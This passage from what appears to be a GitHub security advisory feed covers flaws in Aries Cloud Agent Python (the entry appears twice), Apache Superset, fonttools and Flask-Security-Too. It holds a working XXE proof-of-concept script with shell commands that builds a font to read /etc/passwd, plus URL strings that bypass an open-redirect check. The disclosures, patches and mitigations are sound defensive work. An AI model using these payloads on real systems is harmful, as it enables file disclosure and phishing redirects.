\"did:key:z6MkrpbudRMUpTWSdqFcG2ytbYu2QQfgGFUf8GJpShR8Gy7C#z6MkrpbudRMUpTWSdqFcG2ytbYu2QQfgGFUf8GJpShR8Gy7C\",\n          \"created\": \"2023-11-18T21:39:59.188276+00:00\",\n          \"challenge\": \"ce0956d4-206d-4b69-a087-52bbb9ddaf1d\",\n          \"jws\": \"eyJhbGciOiAiRWREU0EiLCAiYjY0IjogZmFsc2UsICJjcml0IjogWyJiNjQiXX0..4ciLzT3oF-Ch9nngGVgI_fBNIo_RPPXzRuFXjMx4AdwVNM4ioeB3TNDbHsF7fPXANznkZR0bHceyvMN3-CUSAw\"\n        },\n        \"error\": \"The challenge is not as expected; challenge=ce0956d4-206d-4b69-a087-52bbb9ddaf1d, expected=328daf6e-f1f5-475a-944e-6446e7b3a969\",\n        \"purpose_result\": {\n          \"valid\": false,\n          \"error\": \"The challenge is not as expected; challenge=ce0956d4-206d-4b69-a087-52bbb9ddaf1d, expected=328daf6e-f1f5-475a-944e-6446e7b3a969\"\n        }\n      }\n    ],\n    \"errors\": [\n      \"The challenge is not as expected; challenge=ce0956d4-206d-4b69-a087-52bbb9ddaf1d, expected=328daf6e-f1f5-475a-944e-6446e7b3a969\"\n    ]\n  },\n  \"credential_results\": [\n    {\n      \"verified\": true,\n      \"document\": {\n        \"@context\": [\n          \"https://www.w3.org/2018/credentials/v1\",\n          \"https://w3id.org/citizenship/v1\"\n        ],\n        \"type\": [\n          \"VerifiableCredential\",\n          \"PermanentResident\"\n        ],\n        \"issuer\": \"did:sov:EzcfrVw7Tveho5NjrmDWnd\",\n        \"issuanceDate\": \"2023-11-18\",\n        \"credentialSubject\": {\n          \"type\": [\n            \"PermanentResident\"\n          ],\n          \"id\": \"did:key:z6MkrpbudRMUpTWSdqFcG2ytbYu2QQfgGFUf8GJpShR8Gy7C\",\n          \"givenName\": \"Bob\",\n          \"familyName\": \"Builder\",\n          \"gender\": \"Male\",\n          \"birthCountry\": \"Bahamas\",\n          \"birthDate\": \"1958-07-17\"\n        },\n        \"proof\": {\n          \"type\": \"Ed25519Signature2018\",\n          \"proofPurpose\": \"assertionMethod\",\n          \"verificationMethod\": \"did:sov:EzcfrVw7Tveho5NjrmDWnd#key-1\",\n          \"created\": \"2023-11-18T21:39:56.988853+00:00\",\n          \"jws\": \"eyJhbGciOiAiRWREU0EiLCAiYjY0IjogZmFsc2UsICJjcml0IjogWyJiNjQiXX0..eKdLMhKJkiVNzTKOEv14KyAFJnk8QX5MqXPmRE5OjQvwRNkeXk1lQRovhDhXKw154OrSqLHgfSNwBd3xfwuDCA\"\n        }\n      },\n      \"results\": [\n        {\n          \"verified\": true,\n          \"proof\": {\n            \"@context\": [\n              \"https://www.w3.org/2018/credentials/v1\",\n              \"https://w3id.org/citizenship/v1\"\n            ],\n            \"type\": \"Ed25519Signature2018\",\n            \"proofPurpose\": \"assertionMethod\",\n            \"verificationMethod\": \"did:sov:EzcfrVw7Tveho5NjrmDWnd#key-1\",\n            \"created\": \"2023-11-18T21:39:56.988853+00:00\",\n            \"jws\": \"eyJhbGciOiAiRWREU0EiLCAiYjY0IjogZmFsc2UsICJjcml0IjogWyJiNjQiXX0..eKdLMhKJkiVNzTKOEv14KyAFJnk8QX5MqXPmRE5OjQvwRNkeXk1lQRovhDhXKw154OrSqLHgfSNwBd3xfwuDCA\"\n          },\n          \"purpose_result\": {\n            \"valid\": true,\n            \"controller\": {\n              \"@context\": \"https://w3id.org/security/v2\",\n              \"id\": \"did:sov:EzcfrVw7Tveho5NjrmDWnd\",\n              \"assertionMethod\": [\n                \"did:sov:EzcfrVw7Tveho5NjrmDWnd#key-1\"\n              ],\n              \"authentication\": [\n                {\n                  \"id\": \"did:sov:EzcfrVw7Tveho5NjrmDWnd#key-1\",\n                  \"type\": \"Ed25519VerificationKey2018\",\n                  \"controller\": \"did:sov:EzcfrVw7Tveho5NjrmDWnd\",\n                  \"publicKeyBase58\": \"8dMkWKZxsK7vS8sR4XgS7gWvRawPp5TMYVFvnU2RyXqo\"\n                }\n              ],\n              \"verificationMethod\": \"did:sov:EzcfrVw7Tveho5NjrmDWnd#key-1\",\n              \"https://www.w3.org/ns/did#service\": {\n                \"id\": \"did:sov:EzcfrVw7Tveho5NjrmDWnd#did-communication\",\n                \"type\": \"did-communication\",\n                \"https://www.w3.org/ns/did#serviceEndpoint\": {\n                  \"id\": \"http://alice:3000\"\n                }\n              }\n            }\n          }\n        }\n      ]\n    }\n  ],\n  \"errors\": [\n    \"The challenge is not as expected; challenge=ce0956d4-206d-4b69-a087-52bbb9ddaf1d, expected=328daf6e-f1f5-475a-944e-6446e7b3a969\"\n  ]\n}\n</code></pre>\n<p>The flaw enables holders of W3C Format Verifiable Credentials using JSON-LD with Linked Data Proofs (LDPs) to present incorrectly constructed proofs, and allows malicious verifiers to save and replay a presentation from such holders as their own.</p>\n<p>This vulnerability has been present since the first implementation of support for JSON-LD W3C Verifiable Credential Data Model presentations, in Aries Cloud Agent Python release in 0.7.0.</p>\n<p>All ACA-Py Users depending on W3C Format Verifiable Credentials using JSON-LD with Linked Data Proofs are impacted by this vulnerability.</p>\n<h3 id=\"patches\">Patches</h3>\n<p>This issue has been patched in version <a href=\"https://github.com/hyperledger/aries-cloudagent-python/releases/tag/0.10.5\">0.10.5</a> and fixed in <a href=\"https://github.com/hyperledger/aries-cloudagent-python/releases/tag/0.11.0\">0.11.0</a>.</p>\n<h3 id=\"workarounds\">Workarounds</h3>\n<p>There is no workaround other upgrading to a patched/fixed version of ACA-Py.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://github.com/hyperledger/aries-cloudagent-python/security/advisories/GHSA-97x9-59rv-q5pm\">https://github.com/hyperledger/aries-cloudagent-python/security/advisories/GHSA-97x9-59rv-q5pm</a></li>\n<li><a href=\"https://github.com/hyperledger/aries-cloudagent-python/commit/0b01ffffc0789205ac990292f97238614c9fd293\">https://github.com/hyperledger/aries-cloudagent-python/commit/0b01ffffc0789205ac990292f97238614c9fd293</a></li>\n<li><a href=\"https://github.com/hyperledger/aries-cloudagent-python/commit/4c45244e2085aeff2f038dd771710e92d7682ff2\">https://github.com/hyperledger/aries-cloudagent-python/commit/4c45244e2085aeff2f038dd771710e92d7682ff2</a></li>\n<li><a href=\"https://github.com/hyperledger/aries-cloudagent-python/releases/tag/0.10.5\">https://github.com/hyperledger/aries-cloudagent-python/releases/tag/0.10.5</a></li>\n<li><a href=\"https://github.com/hyperledger/aries-cloudagent-python/releases/tag/0.11.0\">https://github.com/hyperledger/aries-cloudagent-python/releases/tag/0.11.0</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-97x9-59rv-q5pm\">https://github.com/advisories/GHSA-97x9-59rv-q5pm</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-97x9-59rv-q5pm",
            "title": "[aries-cloudagent] Hyperledger Aries Cloud Agent Python result of presentation verification not checked for LDP-VC",
            "date_modified": "2024-01-09T21:48:55.000Z",
            "date_published": "2024-01-09T20:31:55.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-97x9-59rv-q5pm"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<h3 id=\"impact\">Impact</h3>\n<p>When verifying W3C Format Verifiable Credentials using JSON-LD with Linked Data Proofs (LDP-VCs), the result of verifying the presentation <code>document.proof</code> was not factored into the final <code>verified</code> value (<code>true</code>/<code>false</code>) on the presentation record. Below is an example result from verifying a JSON-LD Presentation where there is an error noted in the processing (mismatched challenge), but the overall result is incorrectly <code>\"verified\": true</code>:</p>\n<pre><code class=\"language-json\">{\n  \"verified\": true,\n  \"presentation_result\": {\n    \"verified\": false,\n    \"document\": {\n      \"@context\": [\n        \"https://www.w3.org/2018/credentials/v1\"\n      ],\n      \"type\": [\n        \"VerifiablePresentation\"\n      ],\n      \"verifiableCredential\": [\n        {\n          \"@context\": [\n            \"https://www.w3.org/2018/credentials/v1\",\n            \"https://w3id.org/citizenship/v1\"\n          ],\n          \"type\": [\n            \"VerifiableCredential\",\n            \"PermanentResident\"\n          ],\n          \"issuer\": \"did:sov:EzcfrVw7Tveho5NjrmDWnd\",\n          \"issuanceDate\": \"2023-11-18\",\n          \"credentialSubject\": {\n            \"type\": [\n              \"PermanentResident\"\n            ],\n            \"id\": \"did:key:z6MkrpbudRMUpTWSdqFcG2ytbYu2QQfgGFUf8GJpShR8Gy7C\",\n            \"givenName\": \"Bob\",\n            \"familyName\": \"Builder\",\n            \"gender\": \"Male\",\n            \"birthCountry\": \"Bahamas\",\n            \"birthDate\": \"1958-07-17\"\n          },\n          \"proof\": {\n            \"type\": \"Ed25519Signature2018\",\n            \"proofPurpose\": \"assertionMethod\",\n            \"verificationMethod\": \"did:sov:EzcfrVw7Tveho5NjrmDWnd#key-1\",\n            \"created\": \"2023-11-18T21:39:56.988853+00:00\",\n            \"jws\": \"eyJhbGciOiAiRWREU0EiLCAiYjY0IjogZmFsc2UsICJjcml0IjogWyJiNjQiXX0..eKdLMhKJkiVNzTKOEv14KyAFJnk8QX5MqXPmRE5OjQvwRNkeXk1lQRovhDhXKw154OrSqLHgfSNwBd3xfwuDCA\"\n          }\n        }\n      ],\n      \"proof\": {\n        \"type\": \"Ed25519Signature2018\",\n        \"proofPurpose\": \"authentication\",\n        \"verificationMethod\": \"did:key:z6MkrpbudRMUpTWSdqFcG2ytbYu2QQfgGFUf8GJpShR8Gy7C#z6MkrpbudRMUpTWSdqFcG2ytbYu2QQfgGFUf8GJpShR8Gy7C\",\n        \"created\": \"2023-11-18T21:39:59.188276+00:00\",\n        \"challenge\": \"ce0956d4-206d-4b69-a087-52bbb9ddaf1d\",\n        \"jws\": \"eyJhbGciOiAiRWREU0EiLCAiYjY0IjogZmFsc2UsICJjcml0IjogWyJiNjQiXX0..4ciLzT3oF-Ch9nngGVgI_fBNIo_RPPXzRuFXjMx4AdwVNM4ioeB3TNDbHsF7fPXANznkZR0bHceyvMN3-CUSAw\"\n      }\n    },\n    \"results\": [\n      {\n        \"verified\": false,\n        \"proof\": {\n          \"@context\": [\n            \"https://www.w3.org/2018/credentials/v1\"\n          ],\n          \"type\": \"Ed25519Signature2018\",\n          \"proofPurpose\": \"authentication\",\n          \"verificationMethod\": \"did:key:z6MkrpbudRMUpTWSdqFcG2ytbYu2QQfgGFUf8GJpShR8Gy7C#z6MkrpbudRMUpTWSdqFcG2ytbYu2QQfgGFUf8GJpShR8Gy7C\",\n          \"created\": \"2023-11-18T21:39:59.188276+00:00\",\n          \"challenge\": \"ce0956d4-206d-4b69-a087-52bbb9ddaf1d\",\n          \"jws\": \"eyJhbGciOiAiRWREU0EiLCAiYjY0IjogZmFsc2UsICJjcml0IjogWyJiNjQiXX0..4ciLzT3oF-Ch9nngGVgI_fBNIo_RPPXzRuFXjMx4AdwVNM4ioeB3TNDbHsF7fPXANznkZR0bHceyvMN3-CUSAw\"\n        },\n        \"error\": \"The challenge is not as expected; challenge=ce0956d4-206d-4b69-a087-52bbb9ddaf1d, expected=328daf6e-f1f5-475a-944e-6446e7b3a969\",\n        \"purpose_result\": {\n          \"valid\": false,\n          \"error\": \"The challenge is not as expected; challenge=ce0956d4-206d-4b69-a087-52bbb9ddaf1d, expected=328daf6e-f1f5-475a-944e-6446e7b3a969\"\n        }\n      }\n    ],\n    \"errors\": [\n      \"The challenge is not as expected; challenge=ce0956d4-206d-4b69-a087-52bbb9ddaf1d, expected=328daf6e-f1f5-475a-944e-6446e7b3a969\"\n    ]\n  },\n  \"credential_results\": [\n    {\n      \"verified\": true,\n      \"document\": {\n        \"@context\": [\n          \"https://www.w3.org/2018/credentials/v1\",\n          \"https://w3id.org/citizenship/v1\"\n        ],\n        \"type\": [\n          \"VerifiableCredential\",\n          \"PermanentResident\"\n        ],\n        \"issuer\": \"did:sov:EzcfrVw7Tveho5NjrmDWnd\",\n        \"issuanceDate\": \"2023-11-18\",\n        \"credentialSubject\": {\n          \"type\": [\n            \"PermanentResident\"\n          ],\n          \"id\": \"did:key:z6MkrpbudRMUpTWSdqFcG2ytbYu2QQfgGFUf8GJpShR8Gy7C\",\n          \"givenName\": \"Bob\",\n          \"familyName\": \"Builder\",\n          \"gender\": \"Male\",\n          \"birthCountry\": \"Bahamas\",\n          \"birthDate\": \"1958-07-17\"\n        },\n        \"proof\": {\n          \"type\": \"Ed25519Signature2018\",\n          \"proofPurpose\": \"assertionMethod\",\n          \"verificationMethod\": \"did:sov:EzcfrVw7Tveho5NjrmDWnd#key-1\",\n          \"created\": \"2023-11-18T21:39:56.988853+00:00\",\n          \"jws\": \"eyJhbGciOiAiRWREU0EiLCAiYjY0IjogZmFsc2UsICJjcml0IjogWyJiNjQiXX0..eKdLMhKJkiVNzTKOEv14KyAFJnk8QX5MqXPmRE5OjQvwRNkeXk1lQRovhDhXKw154OrSqLHgfSNwBd3xfwuDCA\"\n        }\n      },\n      \"results\": [\n        {\n          \"verified\": true,\n          \"proof\": {\n            \"@context\": [\n              \"https://www.w3.org/2018/credentials/v1\",\n              \"https://w3id.org/citizenship/v1\"\n            ],\n            \"type\": \"Ed25519Signature2018\",\n            \"proofPurpose\": \"assertionMethod\",\n            \"verificationMethod\": \"did:sov:EzcfrVw7Tveho5NjrmDWnd#key-1\",\n            \"created\": \"2023-11-18T21:39:56.988853+00:00\",\n            \"jws\": \"eyJhbGciOiAiRWREU0EiLCAiYjY0IjogZmFsc2UsICJjcml0IjogWyJiNjQiXX0..eKdLMhKJkiVNzTKOEv14KyAFJnk8QX5MqXPmRE5OjQvwRNkeXk1lQRovhDhXKw154OrSqLHgfSNwBd3xfwuDCA\"\n          },\n          \"purpose_result\": {\n            \"valid\": true,\n            \"controller\": {\n              \"@context\": \"https://w3id.org/security/v2\",\n              \"id\": \"did:sov:EzcfrVw7Tveho5NjrmDWnd\",\n              \"assertionMethod\": [\n                \"did:sov:EzcfrVw7Tveho5NjrmDWnd#key-1\"\n              ],\n              \"authentication\": [\n                {\n                  \"id\": \"did:sov:EzcfrVw7Tveho5NjrmDWnd#key-1\",\n                  \"type\": \"Ed25519VerificationKey2018\",\n                  \"controller\": \"did:sov:EzcfrVw7Tveho5NjrmDWnd\",\n                  \"publicKeyBase58\": \"8dMkWKZxsK7vS8sR4XgS7gWvRawPp5TMYVFvnU2RyXqo\"\n                }\n              ],\n              \"verificationMethod\": \"did:sov:EzcfrVw7Tveho5NjrmDWnd#key-1\",\n              \"https://www.w3.org/ns/did#service\": {\n                \"id\": \"did:sov:EzcfrVw7Tveho5NjrmDWnd#did-communication\",\n                \"type\": \"did-communication\",\n                \"https://www.w3.org/ns/did#serviceEndpoint\": {\n                  \"id\": \"http://alice:3000\"\n                }\n              }\n            }\n          }\n        }\n      ]\n    }\n  ],\n  \"errors\": [\n    \"The challenge is not as expected; challenge=ce0956d4-206d-4b69-a087-52bbb9ddaf1d, expected=328daf6e-f1f5-475a-944e-6446e7b3a969\"\n  ]\n}\n</code></pre>\n<p>The flaw enables holders of W3C Format Verifiable Credentials using JSON-LD with Linked Data Proofs (LDPs) to present incorrectly constructed proofs, and allows malicious verifiers to save and replay a presentation from such holders as their own.</p>\n<p>This vulnerability has been present since the first implementation of support for JSON-LD W3C Verifiable Credential Data Model presentations, in Aries Cloud Agent Python release in 0.7.0.</p>\n<p>All ACA-Py Users depending on W3C Format Verifiable Credentials using JSON-LD with Linked Data Proofs are impacted by this vulnerability.</p>\n<h3 id=\"patches\">Patches</h3>\n<p>This issue has been patched in version <a href=\"https://github.com/hyperledger/aries-cloudagent-python/releases/tag/0.10.5\">0.10.5</a> and fixed in <a href=\"https://github.com/hyperledger/aries-cloudagent-python/releases/tag/0.11.0\">0.11.0</a>.</p>\n<h3 id=\"workarounds\">Workarounds</h3>\n<p>There is no workaround other upgrading to a patched/fixed version of ACA-Py.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://github.com/hyperledger/aries-cloudagent-python/security/advisories/GHSA-97x9-59rv-q5pm\">https://github.com/hyperledger/aries-cloudagent-python/security/advisories/GHSA-97x9-59rv-q5pm</a></li>\n<li><a href=\"https://github.com/hyperledger/aries-cloudagent-python/commit/0b01ffffc0789205ac990292f97238614c9fd293\">https://github.com/hyperledger/aries-cloudagent-python/commit/0b01ffffc0789205ac990292f97238614c9fd293</a></li>\n<li><a href=\"https://github.com/hyperledger/aries-cloudagent-python/commit/4c45244e2085aeff2f038dd771710e92d7682ff2\">https://github.com/hyperledger/aries-cloudagent-python/commit/4c45244e2085aeff2f038dd771710e92d7682ff2</a></li>\n<li><a href=\"https://github.com/hyperledger/aries-cloudagent-python/releases/tag/0.10.5\">https://github.com/hyperledger/aries-cloudagent-python/releases/tag/0.10.5</a></li>\n<li><a href=\"https://github.com/hyperledger/aries-cloudagent-python/releases/tag/0.11.0\">https://github.com/hyperledger/aries-cloudagent-python/releases/tag/0.11.0</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-97x9-59rv-q5pm\">https://github.com/advisories/GHSA-97x9-59rv-q5pm</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-97x9-59rv-q5pm",
            "title": "[aries-cloudagent] Hyperledger Aries Cloud Agent Python result of presentation verification not checked for LDP-VC",
            "date_modified": "2024-01-09T21:48:55.000Z",
            "date_published": "2024-01-09T20:31:55.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-97x9-59rv-q5pm"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2023-27524\">https://nvd.nist.gov/vuln/detail/CVE-2023-27524</a></li>\n<li><a href=\"https://lists.apache.org/thread/n0ftx60sllf527j7g11kmt24wvof8xyk\">https://lists.apache.org/thread/n0ftx60sllf527j7g11kmt24wvof8xyk</a></li>\n<li><a href=\"http://www.openwall.com/lists/oss-security/2023/04/24/2\">http://www.openwall.com/lists/oss-security/2023/04/24/2</a></li>\n<li><a href=\"https://github.com/apache/superset/commit/b180319bbf08e876ea84963220ebebbfd0699e03\">https://github.com/apache/superset/commit/b180319bbf08e876ea84963220ebebbfd0699e03</a></li>\n<li><a href=\"http://packetstormsecurity.com/files/172522/Apache-Superset-2.0.0-Authentication-Bypass.html\">http://packetstormsecurity.com/files/172522/Apache-Superset-2.0.0-Authentication-Bypass.html</a></li>\n<li><a href=\"http://packetstormsecurity.com/files/175094/Apache-Superset-2.0.0-Remote-Code-Execution.html\">http://packetstormsecurity.com/files/175094/Apache-Superset-2.0.0-Remote-Code-Execution.html</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-5cx2-vq3h-x52c\">https://github.com/advisories/GHSA-5cx2-vq3h-x52c</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-5cx2-vq3h-x52c",
            "title": "[apache-superset] Apache superset missing check for default SECRET_KEY",
            "date_modified": "2024-01-09T16:41:20.000Z",
            "date_published": "2023-04-24T18:30:30.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-5cx2-vq3h-x52c"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<h3 id=\"summary\">Summary</h3>\n<p>As of <code>fonttools&gt;=4.28.2</code> the subsetting module has a XML External Entity Injection (XXE) vulnerability which allows an attacker to resolve arbitrary entities when a candidate font (OT-SVG fonts), which contains a SVG table, is parsed. </p>\n<p>This allows attackers to include arbitrary files from the filesystem fontTools is running on or make web requests from the host system. </p>\n<h3 id=\"poc\">PoC</h3>\n<p>The vulnerability can be reproduced following the bellow steps on a unix based system.</p>\n<ol>\n<li>Build a OT-SVG font which includes a external entity in the SVG table which resolves a local file. In our testing we utilised <code>/etc/passwd</code> for our POC file to include and modified an existing subset integration test to build the POC font - see bellow.</li>\n</ol>\n<pre><code class=\"language-python\">\nfrom string import ascii_letters\nfrom fontTools.fontBuilder import FontBuilder\nfrom fontTools.pens.ttGlyphPen import TTGlyphPen\nfrom fontTools.ttLib import newTable\n\n\nXXE_SVG = \"\"\"\\\n&lt;?xml version=\"1.0\"?&gt;\n&lt;!DOCTYPE svg [&lt;!ENTITY test SYSTEM 'file:///etc/passwd'&gt;]&gt;\n&lt;svg xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\"&gt;\n  &lt;g id=\"glyph1\"&gt;\n    &lt;text font-size=\"10\" x=\"0\" y=\"10\"&gt;&amp;test;&lt;/text&gt;\n  &lt;/g&gt;\n&lt;/svg&gt;\n\"\"\"\n\ndef main():\n    # generate a random TTF font with an SVG table\n    glyph_order = [\".notdef\"] + list(ascii_letters)\n    pen = TTGlyphPen(glyphSet=None)\n    pen.moveTo((0, 0))\n    pen.lineTo((0, 500))\n    pen.lineTo((500, 500))\n    pen.lineTo((500, 0))\n    pen.closePath()\n    glyph = pen.glyph()\n    glyphs = {g: glyph for g in glyph_order}\n\n    fb = FontBuilder(unitsPerEm=1024, isTTF=True)\n    fb.setupGlyphOrder(glyph_order)\n    fb.setupCharacterMap({ord(c): c for c in ascii_letters})\n    fb.setupGlyf(glyphs)\n    fb.setupHorizontalMetrics({g: (500, 0) for g in glyph_order})\n    fb.setupHorizontalHeader()\n    fb.setupOS2()\n    fb.setupPost()\n    fb.setupNameTable({\"familyName\": \"TestSVG\", \"styleName\": \"Regular\"})\n\n    svg_table = newTable(\"SVG \")\n    svg_table.docList = [\n       (XXE_SVG, 1, 12)\n    ]\n    fb.font[\"SVG \"] = svg_table\n\n    fb.font.save('poc-payload.ttf')\n\nif __name__ == '__main__':\n    main()\n</code></pre>\n<ol start=\"2\">\n<li>Subset the font with an affected version of fontTools - we tested on <code>fonttools==4.42.1</code> and <code>fonttools==4.28.2</code> - using the following flags (which just ensure the malicious glyph is mapped by the font and not discard in the subsetting process):</li>\n</ol>\n<pre><code class=\"language-shell\">pyftsubset poc-payload.ttf --output-file=\"poc-payload.subset.ttf\" --unicodes=\"*\" --ignore-missing-glyphs\n</code></pre>\n<ol start=\"3\">\n<li>Read the parsed SVG table in the subsetted font:</li>\n</ol>\n<pre><code class=\"language-shell\">ttx -t SVG poc-payload.subset.ttf &amp;&amp; cat poc-payload.subset.ttx\n</code></pre>\n<p>Observed the included contents of the <code>/etc/passwd</code> file. </p>\n<h3 id=\"impact\">Impact</h3>\n<p>Note the final severity is dependant on the environment fontTools is running in.</p>\n<ul>\n<li>The vulnerability has the most impact on consumers of fontTools who leverage the subsetting utility to subset untrusted OT-SVG fonts where the vulnerability may be exploited to read arbitrary files from the filesystem of the host fonttools is running on</li>\n</ul>\n<h3 id=\"possible-mitigations\">Possible Mitigations</h3>\n<p>There may be other ways to mitigate the issue, but some suggestions:</p>\n<ol>\n<li>Set the <code>resolve_entities=False</code> flag on parsing methods</li>\n<li>Consider further methods of disallowing doctype declarations</li>\n<li>Consider recursive regex matching</li>\n</ol>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://github.com/fonttools/fonttools/security/advisories/GHSA-6673-4983-2vx5\">https://github.com/fonttools/fonttools/security/advisories/GHSA-6673-4983-2vx5</a></li>\n<li><a href=\"https://github.com/fonttools/fonttools/commit/9f61271dc1ca82ed91f529b130fe5dc5c9bf1f4c\">https://github.com/fonttools/fonttools/commit/9f61271dc1ca82ed91f529b130fe5dc5c9bf1f4c</a></li>\n<li><a href=\"https://github.com/fonttools/fonttools/releases/tag/4.43.0\">https://github.com/fonttools/fonttools/releases/tag/4.43.0</a></li>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2023-45139\">https://nvd.nist.gov/vuln/detail/CVE-2023-45139</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-6673-4983-2vx5\">https://github.com/advisories/GHSA-6673-4983-2vx5</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-6673-4983-2vx5",
            "title": "[fonttools] fonttools XML External Entity Injection (XXE) Vulnerability",
            "date_modified": "2024-01-10T19:14:31.000Z",
            "date_published": "2024-01-09T16:01:10.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-6673-4983-2vx5"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>An open redirect vulnerability in the python package Flask-Security-Too &lt;=5.3.2 allows attackers to redirect unsuspecting users to malicious sites via a crafted URL by abusing the ?next parameter on the /login and /register routes.</p>\n<p>Flask-Security-Too contains logic to validate that the URL specified within the next parameter is either relative or has the same network location as the requesting URL in an attempt to prevent open redirections. Previously known examples that bypassed the validation logic such as <code>https://example/login?next=\\\\\\\\\\\\github.com</code> were patched in version 4.1.0</p>\n<p>However, examples such as <code>https://example/login?next=/\\\\github.com</code> and <code>https://example/login?next=\\\\/github.com</code> were discovered due to how web browsers normalize slashes in URLs, which makes the package vulnerable through version &lt;=5.3.2</p>\n<p>Additionally, with Werkzeug &gt;=2.1.0 the autocorrect_location_header configuration was changed to False - which means that location headers in redirects are relative by default. Thus, this issue may impact applications that were previously not impacted, if they are using Werkzeug &gt;=2.1.0 as the WSGI layer.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2023-49438\">https://nvd.nist.gov/vuln/detail/CVE-2023-49438</a></li>\n<li><a href=\"https://github.com/Flask-Middleware/flask-security\">https://github.com/Flask-Middleware/flask-security</a></li>\n<li><a href=\"https://github.com/brandon-t-elliott/CVE-2023-49438\">https://github.com/brandon-t-elliott/CVE-2023-49438</a></li>\n<li><a href=\"https://github.com/Flask-Middleware/flask-security/commit/8b5abc4d4db9926a3d76b34b8b03255effb5e712\">https://github.com/Flask-Middleware/flask-security/commit/8b5abc4d4db9926a3d76b34b8b03255effb5e712</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-672h-6x89-76m5\">https://github.com/advisories/GHSA-672h-6x89-76m5</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-672h-6x89-76m5",
            "title": "[Flask-Security-Too] Open redirect vulnerability in Flask-Security-Too",
            "date_modified": "2024-01-08T21:47:13.000Z",
            "date_published": "2023-12-27T00:30:25.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-672h-6x89-76m5"
            },
            "tags": [
                "severity"
            ]
        }
    ]
}